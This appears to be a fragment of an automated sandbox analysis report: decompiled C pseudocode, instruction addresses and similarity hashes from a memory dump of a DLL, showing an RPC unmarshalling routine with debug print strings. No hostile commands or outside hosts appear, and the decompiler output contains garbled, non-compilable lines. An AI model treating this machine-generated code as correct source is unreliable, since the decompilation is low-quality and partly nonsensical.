                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push(__ecx);
                                                                                                									_push("uint3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0x10:
                                                                                                									goto L46;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t219 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memset
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 154592334-1168472477
                                                                                                • Opcode ID: 5c99a460764511e66358a924811aaed0d31af31d924fa871dc40ee82b7e2289c
                                                                                                • Instruction ID: cbe06618b368be295ac07c66253cfd13f8e8bce5651b42e4237be6d0a2d05fff
                                                                                                • Opcode Fuzzy Hash: 5c99a460764511e66358a924811aaed0d31af31d924fa871dc40ee82b7e2289c
                                                                                                • Instruction Fuzzy Hash: FEC12AB5A00109AFCB04CF99D890EAA7BB5AF89314F04C519FA594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA9990(void* __ecx, void* __eflags) {
                                                                                                				void* _t214;
                                                                                                				void* _t216;
                                                                                                				void* _t217;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					E6EDA7480(__ecx, _t214 + 0xc,  *((intOrPtr*)(_t214 - 0x10)), 8);
                                                                                                					_t217 = _t216 + 0xc;
                                                                                                					while(1) {
                                                                                                						L47:
                                                                                                						 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t214 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t214 - 0xc) =  *( *(_t214 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t214 - 0xc) =  *(_t214 - 0xc) - 1;
                                                                                                							if( *(_t214 - 0xc) > 0xb8) {
                                                                                                								L46:
                                                                                                								0x6eda0000("unhandled format %d\n",  *( *(_t214 + 0x10)) & 0x000000ff);
                                                                                                								_t217 = _t217 + 8;
                                                                                                								while(1) {
                                                                                                									L47:
                                                                                                									 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t10 =  *(_t214 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                							switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									E6EDAAFA0( *((intOrPtr*)(_t214 + 8)),  *(_t214 + 0xc), 1);
                                                                                                									_push( *(_t214 + 0xc));
                                                                                                									_push( *( *(_t214 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									_t217 = _t217 + 0x18;
                                                                                                									 *(_t214 + 0xc) =  &(( *(_t214 + 0xc))[0]);
                                                                                                									L47:
                                                                                                									 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L12:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [eax]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L13:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  *__edx;
                                                                                                									_push(__ecx);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L14:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [eax]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L15:
                                                                                                									 *(__ebp - 0x1c) = 0;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									_push("pointer => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(__ecx != 0x11) {
                                                                                                										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x1c) = 1;
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp - 0x20);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                										L29:
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                											__edx =  *(__ebp + 0x10);
                                                                                                											__edx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp + 0x14);
                                                                                                											__ecx =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) = __ecx;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L47:
                                                                                                											 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L24:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												__ecx =  *(__edx + 4);
                                                                                                												__ecx =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x20);
                                                                                                										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L29;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L33:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L34:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									goto L0;
                                                                                                								case 0xb:
                                                                                                									L35:
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L36:
                                                                                                									1 = 1 << 0;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp - 0x18);
                                                                                                									_push( *(__ebp - 0x18));
                                                                                                									_push("embedded complex (size=%d) => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                										__edx =  *(__ebp + 0xc);
                                                                                                										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                									}
                                                                                                									__eax =  *(__ebp - 8);
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__edx =  *(0x6edbb418 + __ecx * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no unmarshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp - 8);
                                                                                                										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax = __ebp + 0xc;
                                                                                                											_push(__ebp + 0xc);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L45:
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx = __ebp - 0x24;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp - 0x24);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *__ecx;
                                                                                                									_push( *__ecx);
                                                                                                									_push("int3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									L11:
                                                                                                									__ecx = __ebp - 0x28;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp - 0x28);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push(__ecx);
                                                                                                									_push("uint3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0x10:
                                                                                                									goto L46;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t214 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
